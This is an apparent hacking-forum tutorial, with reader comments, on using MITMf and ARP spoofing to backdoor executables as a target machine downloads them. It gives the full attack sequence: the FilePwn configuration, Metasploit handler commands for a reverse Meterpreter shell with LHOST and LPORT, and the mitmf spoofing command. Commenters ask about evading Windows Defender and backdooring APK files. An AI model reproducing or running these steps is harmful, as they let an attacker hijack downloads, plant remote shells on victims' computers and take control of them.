How To: Backdooring on the Fly with MITMf

Backdooring on the Fly with MITMf

Do you remember my last article on how to hook any web browser with MITMf and BeEF? Well, we are using the tool once again, but this time for auto-backdooring....

How It Works

MITMf (if you don't already know) is a man in the middle attack framwork. MITMf literally stands for "Man In The Middle framework." It includes many, many different tools to help you with MitM attacks. In this case, we are automatically backdooring every downloaded executable for one specific machine. Cool, eh?

We will be ARP spoofing a Windows 8.1 VM machine in this test.

Note: This only works for HTTP sites, so you might want to use SSLstrip+ for any HTTPS sites.

Requirements

Image via ytimg.com

You will only need MITMf and Metasploit for this attack. You can download it from either the aptitude repository (apt-get install mitmf), or through the GitHub repository (git clone https://github.com/byt3bl33d3r/MITMf).

If you choose to install via the apt, remember to run apt-get update first.

Metasploit is build-in to Kali.

Step 1: Editing the Configurations

Now that we have MITMf installed, we need to edit the config files to match our system. We will edit the config file located in /usr/share/mitmf/config/mitmf.cfg.

Scroll down until you get to the FilePwn section.

You can see that under the CompressedFiles section, there is a configuration for many useful payloads. Set the HOST variable to match your IP, but don't change the port. Just remember the port number for the payload you want to use.

Step 2: Selecting the Target

When we run MITMf with FilePwn, we want to listen for the payload specific to the target OS. In this case, I'm targeting a Windows 8.1 machine, so I would use WindowsIntelx86. The port number for that is 8443. Remember your payload's port number for later.

Step 3: Set Up a Listener

We're going to be using Metasploit as our payload listener. Type use multi/handler and then set your payload. in this case, I'm using Meterpreter.

set PAYLOAD windows/meterpreter/reverse_tcp

Set the LHOST and LPORT options...

set LHOST 10.0.2.117
set LPORT 8443
(Make sure you set the corresponding port number!)

Then exploit -j. Open up a new terminal...

Step 4: Running the Attack

To run the attack, use the following command:
mitmf --spoof --arp -i <interface> --gateway <gateway IP> --target <target IP> --filepwn

For me it would be:
mitmf --spoof --arp -i wlan0 --gateway 10.0.2.1 --target 10.0.2.15 --filepwn

Pretty soon you should be getting output like this:

If a user downloads a file, and the file is patchable. you should get some output saying "File patched successfully. Sending to target." if it successfully backdoored. As soon as the victim opens the file, you should get a Meterpreter prompt.

If it doesn't say it's patched, it can't be. Unfortunately, this tactic doesn't work 100% of the time.

Conclusion

Now we know how to run a very neat trick--backdooring on the fly. This gets even better if you do this via mobile, as you will be very discrete. Don't abuse this power. As said in the help menu for MITMf quoting Yoda, "Use wisely, young padawan."

C|H of C3

NOTE: This had been sitting in my drafts for a month now. I've been waiting to post this for a long time.

41 Comments

i really am loving your MITM tutorials. keep it up!

-Phoenix750

Thanks! Appreciation always makes my day. :)

Brings me back to my first comment ever on Null Byte: the feels!

I see you like MITMf quite a lot ah?
Anyway, support for HSTS is as simple as adding a flag, did you omit that for a reason?
Anyway, Good Job.

I've had too many errors with bypassing HSTS, so I'm looking into that.

Another great article, thank you Cracker|Hacker.

By using it from a phone
Do you mean get Linuxdeploy/Nethunter ?

This is going to be so awsome when i use this on my phone thanks man +1 great post

Just the other day I started playing around with MITM, glad you have a good series on it :D

Yeah, I'm just probably going to write an MitM series.

Now, there is an alternative to MITMf, and that's using an evil AP. Should I write something up on that as well (it might take a while)?

of course You should! (if you haven't yet, cause it's been a year since you posted it :) )

Cracker Hacker your a magician at MitM

I have always found much interest in it. Thanks. :)

Cracker | Hacker,
You should definitely, write a tutorial on Evil AP,
No Worries, we can wait :)

Alright, I'll get on it as soon as I get some sleep. *yawn...*

ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ

When I download for example Puttty like you did, I get this output in mitmf:

2015-07-02 22:51:08 192.168.178.27 Detected supported binary type!

* In the backdoor module
* Checking if binary is supported
* Gathering file info
* Reading win32 entry instructions
The following bdfactorys are available: (use -s)
caveminerinline
iatreversetcpinline
iat
reversetcpinlinethreaded
iat
reversetcpstagerthreaded
iat
usersuppliedshellcodethreaded
meterpreter
reversehttpsthreaded
reverseshelltcpinline
reverse
tcpstagerthreaded
usersuppliedshellcodethreaded

And the target pc just downloads the file and 'gets away'.

What am I missing here?

And by the way, does this only work on .exe files?

ApeRock

I don't know about the 1st question...

MITMf backdoored .exe and .zip files.

same thing i get, and i cant find any information anywhere about how to solve this issue. any help is greatly appreciated

What i have to do after this show up?

  • In the backdoor module
  • Checking if binary is supported
  • Gathering file info
  • Reading win32 entry instructions

The following bdfactorys are available: (use -s)
caveminerinline
iatreversetcpinline
iatreversetcpinlinethreaded
iatreversetcpstagerthreaded
iatusersuppliedshellcodethreaded
meterpreterreversehttpsthreaded
reverseshelltcpinline
reversetcpstagerthreaded
usersuppliedshellcodethreaded

Perhaps the executable was not backdoorable, but I'm not fully sure.

I got the same! Pretty weird...

Great tutorial however there is one thing. Windows defender is pretty proficient at picking up metasploit backdoored executables. It even auto deletes them sometimes. I would reccomend Hyperion or some other third party encoders, I'm assuming you'd need to generate the custom shellcode and supply it to mitmf instead of using the default MSF payload? Many thanks for introducing me to this :)

How to I change the payload to a python AES encrypted payload?

I didnt get what it exactly does... does it inject payload to a file that the victim wanted to download??
Or just sends a file to victim pc??

when a victim downloads a backdoorable file, mitmf intercepts it, injects a payload in it, and then sends it to the user again. basically both your options combined.

-Phoenix750

In addition to what Phoenix750 said, because you are ARP spoofing, you are intercepting their packets as they go through you.

Image via wikimedia.org

So like I downloaded a program say winrar.exe
What itll do is inject payload into winrara.exe??
And winrar.exe will work normally as its supposed to and in the background our payload will work too??

Wow thnx thats really awesome!!

So this is showing the data going but hasn't showed the files created successfully. Does it just take a long time or do I need to be browsing more?

Is encryption on the fly possible?
It's cool thing but I suppose that without encryption it's pretty worthless in practice or am I wrong?

At step 2 .. for a windows 7 machine 64bit would I use the same as in the tutorial or the windowsintelx64?

You should use windiwsintelx64 since you are using a 64 bit system. I´m not completely sure but i think you can use thex86 (32 bit) one on a 64 bit system, since windows should have compatibility for it.

Hello. This was a very nice tutorial for beginners. Though the last phrase was a bit vague: ''If it doesn't say it's patched, it can't be. Unfortunately, this tactic doesn't work 100% of the time.''. Is there any manual page or something that specifies when it does work and when not??

Hi Great Cracker|Hacker :)
""" How can I backdoor an .apk file on the fly? """

Once I started infecting apks , after injecting my malicious codes in the apk file I had problems with signing them, then I solved this with an sign.jar file. I think this problem would happen for backdooring apks on the fly. Am I right?

Share Your Thoughts

  • Hot
  • Latest